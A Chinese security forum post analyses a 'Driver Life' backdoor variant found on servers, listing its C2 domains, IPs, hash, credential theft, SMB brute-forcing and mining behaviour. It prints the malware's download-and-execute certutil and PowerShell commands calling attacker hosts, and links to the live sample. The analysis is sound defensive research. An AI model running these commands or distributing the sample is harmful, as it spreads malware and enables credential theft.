好友
阅读权限10
听众
最后登录1970-1-1
|
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子! 病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途! 禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 616804390 于 2019-6-10 20:57 编辑
在近期排查几台服务器的过程中,发现了“驱动人生”后门变种,从木马中提取的相关域名和ip如下:
v.beahh.com/o.beahh.com/new.beahh.com/cert.beahh.com/loop.hqo.net/w.beahh.com
C&C端ip: 172.104.73.9/172.104.78.101/153.92.4.49
病毒MD5:96bdb44e072122ee05fb8e729063463c
病毒名称svchost.exe
该木马运行后会释放一个m.ps1 PowerShell运行程序,此程序会调用Mimikatz脚本,进行本机用户和密码的抓取, 同时创建计划任务,每天7点自动向w.beahh.com发送http请求下载域名解析后服务器上的程序,并以HTA(内含微软某CVE漏洞的payload)运行方式执行的命令。
该木马会发送基于445端口的SMB数据包,同时具有扫描内网和外网开放445端口的ip,即便已安装永恒之蓝的补丁,也无法遏制内网传播,一旦开启了SMB服务则有可能会中毒,该木马是利用445端口进行SMB域账户爆破,该病毒实施的SMB爆破行为,是基于SMBV2协议的一种攻击方式,且木马中内置弱口令账户和密码,同通过IPC$空连接进行SMB服务的账户爆破或登陆。
该病毒获取到用户名或密码时,无论是爆破还是抓取到的用户名密码,通过IPC$登陆后,对中病毒机器执行以下命令进行远程下载执行,同时设置端口转发,将来自65532端口的流量转发到1.1.1.1地址的53端口,将来自65531端口的流量转发到1.1.1.1地址的53端口。
cmd.exe /c certutil -urlcache -split -f http://dl.haqo.net/dl.exe c:/install.exe&c:/install.exe&netsh firewall add portopening tcp 65531 DNS&netsh interface portproxy add v4tov4 listenport=65531 connectaddress=1.1.1.1 connectport=53
病毒同时也会创建可写文件update.exe文件。
分析update.exe如下:
该文件中发送指令通过RSA算法进行加密, 获取指令后通过编码RSA公钥进行解密,最终执行远程命令。
文件中对I am the mxr report进行互斥体判断,打开互斥体,即mxr(门罗币挖矿)程序。
病毒拥有远控功能,运行后将本机的CUP型号,操作系统版本,MAC地址,ip地址,域用户名,显卡信息,挖矿线程,以及计算机参数传递给终端:
该脚本新增一个计划任务,计划每天7:00运行C:\windows\temp\svchost.exe程序,同时向域名端发送远程下载执行命令,加密内容解密后为:
(NewObjectNet.WebClient).downloadstring('http://v.beahh.com/v'+$env:USERDOMAIN)
病毒拥有识别以下游戏进程功能:
crossfire.exe|war3.exe|metor.exe|KartRider.exe|ra2.exe|wow.exe|wow64.exe|xy3launch.exe|cstrike.exe|gtavc.exe|crossfire.exe|MIR2.exe|mir3.exe|JX3Client.exe|cstrikeonline.exe|qqfo.exe|DNFchina.exe|xypqlayer.exe|palonline.exe|digimon.exe|DNF.exe|FF2Client.exe|LolClient.exe|KartRider.exe|dota.exe|dota2.exe|TslGame.exe,
病毒具有识别以下杀毒软件的功能:|360tray.exe|360sd.exe|avp.exe|vMonXP.exe|RavMonD.exe|Mcshield.exe|egui.exe|kxetray.exe|knsdtray.exe|TMBMSRV.exe|avcenter.exe|ashDisp.exe|rtvscan.exe|ksafe.exe|QQPCRTP.exe
在排查的服务器上并未发现病毒有挖矿功能的挖矿行为,由于病毒功能黑客可远程执行,黑客应该是在通过传播广泛后,在肉鸡量足够多时,统一执行,且发现黑客的病毒也在不断更新中。
附病毒样本:链接: https://pan.baidu.com/s/13CJr6Zs7vyytkTISx0xofA 提取码: mp4k 文件大小:7.9M(也是第一次见这么大的马子)
|
免费评分
-
查看全部评分
|
发帖前要善用【论坛搜索】功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。 |
|
|
|
|